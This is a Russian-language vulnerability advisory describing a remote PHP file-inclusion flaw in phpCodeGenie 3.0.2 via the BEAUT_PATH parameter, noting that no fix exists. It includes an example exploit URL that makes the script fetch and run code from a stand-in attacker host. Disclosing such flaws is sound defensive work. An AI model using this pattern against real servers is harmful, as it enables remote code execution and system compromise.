PHP-инклюдинг в phpCodeGenie

Дата публикации:
22.08.2006
Дата изменения:
16.10.2006
Всего просмотров:
10990
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpCodeGenie 3.x
Уязвимые версии: phpCodeGenie 3.0.2, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "BEAUT_PATH" в сценарии app/common/lib/codeBeautifier/Beautifier/Core.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/[phpCodeGenie_path]/app/common/lib/codeBeautifier/Beautifier/
Core.php?BEAUT_PATH=[http://www.myevilsite.com/evil_scripts.txt]

URL производителя: sourceforge.net/projects/phpcodegenie/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability

или введите имя

CAPTCHA